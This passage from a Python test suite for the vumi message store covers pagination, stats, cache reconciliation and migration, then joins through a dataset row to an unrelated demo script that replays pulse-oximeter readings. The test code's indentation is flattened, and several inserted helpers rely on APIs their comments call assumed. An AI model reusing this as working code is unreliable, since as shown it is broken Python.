all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_event_keys_with_statuses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
events = yield self.create_events(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(ev['timestamp']), ev.status(), ev['event_id'])
for ev in events], reverse=True)
all_keys = [(key, timestamp, status)
for (timestamp, status, key) in sorted_keys]
page = yield self.store.batch_event_keys_with_statuses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_message_event_keys_with_statuses(self):
"""
Event keys and statuses for a message can be retrieved by index.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
drs = []
for status in TransportEvent.DELIVERY_STATUSES:
dr = self.msg_helper.make_delivery_report(
msg, delivery_status=status)
drs.append(dr)
yield self.store.add_event(dr)
def mk_tuple(e, status):
return e["event_id"], format_vumi_date(e["timestamp"]), status
all_keys = [mk_tuple(ack, "ack")] + [
mk_tuple(e, "delivery_report.%s" % (e["delivery_status"],))
for e in drs]
first_page = yield self.store.message_event_keys_with_statuses(
msg_id, max_results=3)
results = list(first_page)
self.assertEqual(len(results), 3)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 4)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_stats(self):
"""
batch_inbound_stats returns total and unique address counts for the
whole batch if no time range is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
inbound_stats = yield self.store.batch_inbound_stats(
batch_id, max_results=6)
self.assertEqual(inbound_stats, {"total": 10, "unique_addresses": 3})
@inlineCallbacks
def test_batch_inbound_stats_start(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages newer than the start date if only the start date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1])
self.assertEqual(inbound_stats_1, {"total": 8, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[6][1])
self.assertEqual(inbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_inbound_stats_end(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages older than the end date if only the end date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, end=all_keys[-3][1])
self.assertEqual(inbound_stats_1, {"total": 8, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, end=all_keys[-7][1])
self.assertEqual(inbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_inbound_stats_range(self):
"""
batch_inbound_stats returns total and unique address counts for all
messages newer than the start date and older than the end date if both
are specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_inbound_messages(
batch_id, 5, start_timestamp=now, from_addr=u'00005')
messages_3 = yield self.create_inbound_messages(
batch_id, 3, start_timestamp=start_3, from_addr=u'00003')
messages_2 = yield self.create_inbound_messages(
batch_id, 2, start_timestamp=start_2, from_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
inbound_stats_1 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-3][1])
self.assertEqual(inbound_stats_1, {"total": 6, "unique_addresses": 3})
inbound_stats_2 = yield self.store.batch_inbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-7][1])
self.assertEqual(inbound_stats_2, {"total": 2, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats(self):
"""
batch_outbound_stats returns total and unique address counts for the
whole batch if no time range is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
outbound_stats = yield self.store.batch_outbound_stats(
batch_id, max_results=6)
self.assertEqual(outbound_stats, {"total": 10, "unique_addresses": 3})
@inlineCallbacks
def test_batch_outbound_stats_start(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages newer than the start date if only the start date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1])
self.assertEqual(outbound_stats_1, {"total": 8, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[6][1])
self.assertEqual(outbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats_end(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages older than the end date if only the end date is specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, end=all_keys[-3][1])
self.assertEqual(outbound_stats_1, {"total": 8, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, end=all_keys[-7][1])
self.assertEqual(outbound_stats_2, {"total": 4, "unique_addresses": 2})
@inlineCallbacks
def test_batch_outbound_stats_range(self):
"""
batch_outbound_stats returns total and unique address counts for all
messages newer than the start date and older than the end date if both
are specified.
"""
batch_id = yield self.store.batch_start([('pool', 'tag')])
now = datetime.now()
start_3 = now - timedelta(5)
start_2 = now - timedelta(35)
messages_5 = yield self.create_outbound_messages(
batch_id, 5, start_timestamp=now, to_addr=u'00005')
messages_3 = yield self.create_outbound_messages(
batch_id, 3, start_timestamp=start_3, to_addr=u'00003')
messages_2 = yield self.create_outbound_messages(
batch_id, 2, start_timestamp=start_2, to_addr=u'00002')
messages = messages_5 + messages_3 + messages_2
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
outbound_stats_1 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-3][1])
self.assertEqual(outbound_stats_1, {"total": 6, "unique_addresses": 3})
outbound_stats_2 = yield self.store.batch_outbound_stats(
batch_id, start=all_keys[2][1], end=all_keys[-7][1])
self.assertEqual(outbound_stats_2, {"total": 2, "unique_addresses": 2})
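    # batch_inbound_stats and batch_outbound_stats, as exercised above, reduce
    # an index range to {"total": ..., "unique_addresses": ...}. The expected
    # values in the assertions amount to this client-side reduction over
    # (key, timestamp, addr) tuples (illustrative only):
    @staticmethod
    def _expected_stats(keys):
        return {
            "total": len(keys),
            "unique_addresses": len(set(addr for (_, _, addr) in keys)),
        }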
class TestMessageStoreCache(TestMessageStoreBase):
def clear_cache(self, message_store):
        # FakeRedis provides a flushdb() method, but TxRedisManager doesn't,
        # and the intended behaviour of flushdb() on a submanager is unclear,
        # so we purge the keys directly instead.
return message_store.cache.redis._purge_all()
@inlineCallbacks
def test_cache_batch_start(self):
batch_id = yield self.store.batch_start([("poolA", "tag1")])
self.assertTrue((yield self.store.cache.batch_exists(batch_id)))
self.assertTrue(batch_id in (yield self.store.cache.get_batch_ids()))
@inlineCallbacks
def test_cache_add_outbound_message(self):
msg_id, msg, batch_id = yield self._create_outbound()
[cached_msg_id] = (
yield self.store.cache.get_outbound_message_keys(batch_id))
cached_to_addrs = yield self.store.cache.get_to_addrs(batch_id)
self.assertEqual(msg_id, cached_msg_id)
# NOTE: This functionality is disabled for now.
# self.assertEqual([msg['to_addr']], cached_to_addrs)
self.assertEqual([], cached_to_addrs)
@inlineCallbacks
def test_cache_add_inbound_message(self):
msg_id, msg, batch_id = yield self._create_inbound()
[cached_msg_id] = (
yield self.store.cache.get_inbound_message_keys(batch_id))
cached_from_addrs = yield self.store.cache.get_from_addrs(batch_id)
self.assertEqual(msg_id, cached_msg_id)
# NOTE: This functionality is disabled for now.
# self.assertEqual([msg['from_addr']], cached_from_addrs)
self.assertEqual([], cached_from_addrs)
@inlineCallbacks
def test_cache_add_event(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = TransportEvent(user_message_id=msg_id, event_type='ack',
sent_message_id='xyz')
yield self.store.add_event(ack)
self.assertEqual((yield self.store.cache.get_event_status(batch_id)), {
'delivery_report': 0,
'delivery_report.delivered': 0,
'delivery_report.failed': 0,
'delivery_report.pending': 0,
'ack': 1,
'nack': 0,
'sent': 1,
})
@inlineCallbacks
def test_needs_reconciliation(self):
msg_id, msg, batch_id = yield self._create_outbound()
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
msg_id, msg, batch_id = yield self._create_outbound()
# Store via message_store
yield self.create_outbound_messages(batch_id, 10)
        # Store one extra in the cache to push the count difference past the
        # allowed threshold delta.
recon_msg = self.msg_helper.make_outbound("foo")
yield self.store.cache.add_outbound_message(batch_id, recon_msg)
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
# More liberal reconciliation delta should return False
self.assertFalse((
yield self.store.needs_reconciliation(batch_id, delta=0.1)))
@inlineCallbacks
def test_reconcile_cache(self):
cache = self.store.cache
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
yield self.create_inbound_messages(batch_id, 1, from_addr='from1')
yield self.create_inbound_messages(batch_id, 2, from_addr='from2')
yield self.create_inbound_messages(batch_id, 3, from_addr='from3')
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
yield self.clear_cache(self.store)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, {})
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
yield self.store.reconcile_cache(batch_id)
# Reconciliation check should return False after recon.
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
self.assertFalse(
(yield self.store.needs_reconciliation(batch_id, delta=0)))
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status['ack'], 10)
self.assertEqual(batch_status['sent'], 10)
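    # The flow above suggests a small operational helper: reconcile a batch
    # only when its cached counts have drifted. A sketch built solely from
    # the store API exercised in this test:
    @inlineCallbacks
    def _reconcile_if_needed(self, batch_id, delta=0.05):
        if (yield self.store.needs_reconciliation(batch_id, delta=delta)):
            yield self.store.reconcile_cache(batch_id)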
@inlineCallbacks
def test_reconcile_cache_with_old_and_new_messages(self):
"""
If we're reconciling a batch that contains messages older than the
truncation threshold and newer than the start of the recon, we still
end up with the correct numbers.
"""
cache = self.store.cache
cache.TRUNCATE_MESSAGE_KEY_COUNT_AT = 5
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
inbound_messages = []
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 1, from_addr='from1')))
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 2, from_addr='from2')))
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 3, from_addr='from3')))
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
dr = self.msg_helper.make_delivery_report(
msg, delivery_status="delivered")
yield self.store.add_event(dr)
# We want one message newer than the start of the recon, and they're
# ordered from newest to oldest.
start_timestamp = format_vumi_date(inbound_messages[1]["timestamp"])
yield self.store.reconcile_cache(batch_id, start_timestamp)
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield self.store.cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield self.store.cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status["sent"], 10)
self.assertEqual(batch_status["ack"], 10)
self.assertEqual(batch_status["delivery_report"], 10)
self.assertEqual(batch_status["delivery_report.delivered"], 10)
@inlineCallbacks
def test_reconcile_cache_and_switch_to_counters(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
cache = self.store.cache
# Clear the cache and restart the batch without counters.
yield cache.clear_batch(batch_id)
yield cache.batch_start(batch_id, use_counters=False)
# Store via message_store
yield self.create_inbound_messages(batch_id, 1, from_addr='from1')
yield self.create_inbound_messages(batch_id, 2, from_addr='from2')
yield self.create_inbound_messages(batch_id, 3, from_addr='from3')
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
# This will fail if we're using counter-based events with a ZSET.
events_scard = yield cache.redis.scard(cache.event_key(batch_id))
# HACK: We're not tracking these in the SET anymore.
# See HACK comment in message_store_cache.py.
# self.assertEqual(events_scard, 10)
self.assertEqual(events_scard, 0)
yield self.clear_cache(self.store)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, {})
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
yield self.store.reconcile_cache(batch_id)
# Reconciliation check should return False after recon.
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
self.assertFalse(
(yield self.store.needs_reconciliation(batch_id, delta=0)))
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield self.store.cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield self.store.cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status['ack'], 10)
self.assertEqual(batch_status['sent'], 10)
# This will fail if we're using old-style events with a SET.
events_zcard = yield cache.redis.zcard(cache.event_key(batch_id))
self.assertEqual(events_zcard, 10)
@inlineCallbacks
def test_find_inbound_keys_matching(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
messages = yield self.create_inbound_messages(batch_id, 10)
token = yield self.store.find_inbound_keys_matching(batch_id, [{
'key': 'msg.content',
'pattern': '.*',
'flags': 'i',
}], wait=True)
keys = yield self.store.get_keys_for_token(batch_id, token)
in_progress = yield self.store.cache.is_query_in_progress(
batch_id, token)
self.assertEqual(len(keys), 10)
self.assertEqual(
10, (yield self.store.count_keys_for_token(batch_id, token)))
self.assertEqual(keys, [msg['message_id'] for msg in messages])
self.assertFalse(in_progress)
@inlineCallbacks
def test_find_outbound_keys_matching(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
messages = yield self.create_outbound_messages(batch_id, 10)
token = yield self.store.find_outbound_keys_matching(batch_id, [{
'key': 'msg.content',
'pattern': '.*',
'flags': 'i',
}], wait=True)
keys = yield self.store.get_keys_for_token(batch_id, token)
in_progress = yield self.store.cache.is_query_in_progress(
batch_id, token)
self.assertEqual(len(keys), 10)
self.assertEqual(
10, (yield self.store.count_keys_for_token(batch_id, token)))
self.assertEqual(keys, [msg['message_id'] for msg in messages])
self.assertFalse(in_progress)
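    # Both find_*_keys_matching calls above pass wait=True. A caller that
    # starts a query without waiting can poll is_query_in_progress() before
    # fetching the keys. A sketch; the Twisted imports are done inline to
    # keep it self-contained, and returnValue is assumed available:
    @inlineCallbacks
    def _wait_for_query_keys(self, batch_id, token, poll_interval=0.1):
        from twisted.internet import reactor
        from twisted.internet.task import deferLater
        while (yield self.store.cache.is_query_in_progress(batch_id, token)):
            yield deferLater(reactor, poll_interval, lambda: None)
        returnValue((yield self.store.get_keys_for_token(batch_id, token)))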
@inlineCallbacks
def test_get_inbound_message_keys(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
keys = yield self.store.get_inbound_message_keys(batch_id)
self.assertEqual(keys, [msg['message_id'] for msg in messages])
@inlineCallbacks
def test_get_inbound_message_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
results = dict((yield self.store.get_inbound_message_keys(
batch_id, with_timestamp=True)))
for msg in messages:
found = results[msg['message_id']]
expected = time.mktime(msg['timestamp'].timetuple())
self.assertAlmostEqual(found, expected)
@inlineCallbacks
def test_get_outbound_message_keys(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
keys = yield self.store.get_outbound_message_keys(batch_id)
self.assertEqual(keys, [msg['message_id'] for msg in messages])
@inlineCallbacks
def test_get_outbound_message_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
results = dict((yield self.store.get_outbound_message_keys(
batch_id, with_timestamp=True)))
for msg in messages:
found = results[msg['message_id']]
expected = time.mktime(msg['timestamp'].timetuple())
self.assertAlmostEqual(found, expected)
class TestMigrationFunctions(TestMessageStoreBase):
@inlineCallbacks
def test_add_batches_to_event_no_batches(self):
"""
If the stored event has no batches, they're looked up from the outbound
message and added to the event.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[])
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [])
updated = yield add_batches_to_event(event)
self.assertEqual(updated, True)
self.assertEqual(event.batches.keys(), [batch_id])
@inlineCallbacks
def test_add_batches_to_event_with_batches(self):
"""
If the stored event already has batches, we do nothing.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[batch_id])
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
updated = yield add_batches_to_event(event)
self.assertEqual(updated, False)
self.assertEqual(event.batches.keys(), [batch_id])
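# add_batches_to_event(event) reports whether it changed the event, which
# makes it easy to drive as a bulk backfill. A hypothetical driver sketch;
# save() on the loaded event is an assumption about the model API, and
# returnValue is assumed to be imported:
@inlineCallbacks
def migrate_event_batches(store, event_ids):
    migrated = 0
    for event_id in event_ids:
        event = yield store.events.load(event_id)
        if (yield add_batches_to_event(event)):
            yield event.save()
            migrated += 1
    returnValue(migrated)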
1c0767e1b1f9a81e2dac90983d8c900cbe26e1a7 | 5,525 | py | Python | src/main/python/cosmopusher/demo_stream.py | konz/cosmopusher | 7701b3ecd5d2e7fa90e34e75cb53a0dd12c6124c | ["Apache-2.0"] | null | null | null
from io import StringIO
from time import sleep
DATA = '''sóme garbäge first
29-Dec-17 07:18:43 99 66 12
29-Dec-17 07:18:45 99 66 17 MO
29-Dec-17 07:18:47 99 66 18 MO
29-Dec-17 07:18:49 99 66 52
29-Dec-17 07:18:51 99 66 61 MO
29-Dec-17 07:18:53 99 66 13 MO
29-Dec-17 07:18:55 99 66 8 MO
29-Dec-17 07:18:57 89* 66 201 MO SL
29-Dec-17 07:18:59 83* 66 200 MO SL
29-Dec-17 07:19:01 79* 66 18 MO SL AS
29-Dec-17 07:19:03 77* 66 30 MO SL AS
29-Dec-17 07:19:05 77* 66 8 MO SL AS
29-Dec-17 07:19:07 77* 70 8 SL AS
29-Dec-17 07:19:09 78* 70 29 MO SL AS
29-Dec-17 07:19:11 78* 70 25 MO SL AS
29-Dec-17 07:19:13 78* 70 4 MO SL AS
29-Dec-17 07:19:15 77* 70 4 MO SL AS
29-Dec-17 07:19:17 75* 71 9 MO SL AS
29-Dec-17 07:19:19 73* 71 9 MO SL AS
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:19:21 74* 70 11 MO SL AS
29-Dec-17 07:19:23 73* 70 36 MO SL AS
29-Dec-17 07:19:25 73* 70 44 MO SL AS
29-Dec-17 07:19:27 73* 70 12 MO SL AS
29-Dec-17 07:19:29 --- --- --- SD AS
29-Dec-17 07:19:31 --- --- --- SD AS
29-Dec-17 07:19:33 --- --- --- SD AS
29-Dec-17 07:19:35 --- --- --- SD AS
29-Dec-17 07:19:37 --- --- --- SD AS
29-Dec-17 07:19:39 --- --- --- SD AS
29-Dec-17 07:19:41 --- --- --- SD AS
29-Dec-17 07:19:43 --- --- --- SD AS
29-Dec-17 07:19:45 --- --- --- SD AS
29-Dec-17 07:19:47 --- --- --- SD AS
29-Dec-17 07:19:49 --- --- --- SD AS
29-Dec-17 07:19:51 --- --- --- SD AS
29-Dec-17 07:19:53 --- --- --- SD AS
29-Dec-17 07:19:55 --- --- --- SD AS
29-Dec-17 07:19:57 --- --- --- SO AS
29-Dec-17 07:19:59 --- --- --- SO
29-Dec-17 07:20:01 --- --- --- SO
29-Dec-17 07:20:03 --- --- --- SO
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:20:05 --- --- --- SO
29-Dec-17 07:20:07 --- --- --- SO
29-Dec-17 07:20:09 --- --- --- SO
29-Dec-17 07:20:11 --- --- --- SO
29-Dec-17 07:20:13 --- --- --- SO
29-Dec-17 07:20:15 --- --- --- SO
29-Dec-17 07:20:17 --- --- --- SO
29-Dec-17 07:20:19 --- --- --- SO
29-Dec-17 07:20:21 --- --- --- SO
29-Dec-17 07:20:23 --- --- --- SO
29-Dec-17 07:20:25 --- --- --- SO
29-Dec-17 07:20:27 0 0 --- PS
29-Dec-17 07:20:29 0 0 --- PS
29-Dec-17 07:20:31 0 0 --- PS
29-Dec-17 07:20:33 0 0 --- PS
29-Dec-17 07:20:35 0 0 --- PS
29-Dec-17 07:20:37 0 0 --- PS
29-Dec-17 07:20:39 0 0 --- PS
29-Dec-17 07:20:41 0 0 --- PS
29-Dec-17 07:20:43 94 119 5
29-Dec-17 07:20:45 94 103 4
29-Dec-17 07:20:47 94 92 4
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:20:49 94 91 4 MO
29-Dec-17 07:20:51 95 88 4 MO
29-Dec-17 07:20:53 95 83 5
29-Dec-17 07:20:55 95 77 4
29-Dec-17 07:20:57 95 72 4
29-Dec-17 07:20:59 96 70 4
29-Dec-17 07:21:01 97 68 5
29-Dec-17 07:21:03 97 65 5
29-Dec-17 07:21:05 97 63 6
29-Dec-17 07:21:07 97 63 5
29-Dec-17 07:21:09 97 63 5 MO
29-Dec-17 07:21:11 96 63 7 MO
29-Dec-17 07:21:13 96 63 --- PS
'''
class DemoStream:
    """Replays the captured N-560 printout above as an endless stream,
    emitting one line every two seconds to mimic a live serial feed."""
    def readlines(self):
        while True:
            for line in StringIO(DATA).readlines():
                sleep(2)
                yield line
